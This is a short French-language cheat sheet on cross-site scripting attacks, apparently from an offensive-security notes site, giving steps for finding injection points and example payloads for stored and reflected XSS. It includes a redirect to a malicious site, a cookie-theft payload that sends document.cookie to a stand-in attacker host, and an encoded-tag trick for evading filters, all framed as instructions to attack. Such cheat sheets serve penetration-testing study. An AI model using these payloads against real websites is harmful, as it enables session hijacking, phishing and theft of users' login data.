Attaques XSS

Attaques XSS (Cross-Site Scripting) - Cheatsheet

  1. Identification de Vulnérabilités :

    • Testez les champs d'entrée, les formulaires, les paramètres d'URL et les zones de commentaires pour identifier les points d'injection XSS possibles.

    • Recherchez les messages d'erreur ou les filtrages de caractères qui pourraient indiquer une vulnérabilité.

  2. Injection XSS Persistante (Stockée) :

    • Injectez du code malveillant qui sera sauvegardé sur le serveur et affectera tous les utilisateurs qui afficheront la page.

    • Exemple : <script>alert('XSS attaque !');</script>

  3. Injection XSS Réfléchie (Non Persistante) :

    • Injectez du code malveillant qui sera exécuté uniquement lorsque l'utilisateur clique sur un lien ou visite une URL spécialement conçue.

    • Exemple : <img src="x" onerror="alert('XSS attaque !')">

  4. Redirection de Page et Hameçonnage :

    • Utilisez l'injection XSS pour rediriger les utilisateurs vers des sites malveillants ou pour voler leurs informations de connexion.

    • Exemple : <script>window.location.href = 'http://site-malveillant.com';</script>

  5. Vol de Cookies et Sessions :

    • Utilisez l'injection XSS pour voler les cookies de session des utilisateurs et usurper leurs identités.

    • Exemple : <script>document.location='http://site-malveillant.com/steal.php?cookie='+document.cookie;</script>

  6. Utilisation de Payloads Furtifs :

    • Utilisez des techniques d'obfuscation pour masquer le code malveillant et éviter la détection.

    • Exemple : <s%63ript>alert('XSS attaque !');</s%63ript>

PreviousEnumeration de dossiers et fichiersNextInjections SQL

Last updated